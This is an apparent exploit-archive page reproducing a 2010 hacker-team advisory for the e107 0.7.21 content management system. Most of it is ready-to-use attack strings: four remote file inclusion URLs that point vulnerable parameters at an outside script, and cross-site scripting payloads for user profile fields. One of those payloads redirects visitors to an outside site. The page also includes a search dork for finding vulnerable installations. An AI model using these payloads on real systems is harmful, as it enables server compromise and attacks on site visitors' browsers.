e107 0.7.21 cross site scripting and remote file inclusion
CVE
Category
Price
Severity
N/A
CWE-79, CWE-98
Unknown
High
Author
Risk
Exploitation Type
Date
Exploit Alert
High
Remote
2010-06-05
CPE
cpe:cpe:/a:e107:0.7.21
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010060013 Below is a copy:====================================================================
# e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities
===
1 ____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 #################################### 1
0 I'm indoushka member from Inj3ct0r Team 1
1 #################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
########################################################################
# Name: e107 0.7.21 full (RFI) Vulnerabilities
# Vendor: http://e107.org/
# Date: 2010-05-27
# Author : indoushka
# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com !
# Contact : [email protected]
# Home : www.arab-blackhat.co.cc
# Bug : RFI
# Tested on : windows SP2 Franais V.(Pnx2 2.0)
########################################################################
# Dork : This site is powered by e107, which is released under the terms of the GNU GPL License.
# Exploit By indoushka
I - RFI:
1 - http://localhost/e107/fpw.php?THEMES_DIRECTORY=http://localhost/c.txt?
2 - http://localhost/e107/e107_handlers/secure_img_render.php?ifile=http://localhost/c.txt?
3 - http://localhost/e107/e107_plugins/content/handlers/content_class.php?plugindir=http://localhost/c.txt?
4 - http://localhost/e107/e107_plugins/content/handlers/content_convert_class.php?plugindir=http://localhost/c.txt?
II - XSS :
After Rigester Go to user Seting
1 - http://127.0.0.1/e107/usersettings.php
and Edit Signature / Timezone Put this code Or other's
( ">"">>>><script>location="http://www.arab-blackhat.co.cc"</script>""""> )
( <ScRiPt>alert(213771818860)</ScRiPt> )
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum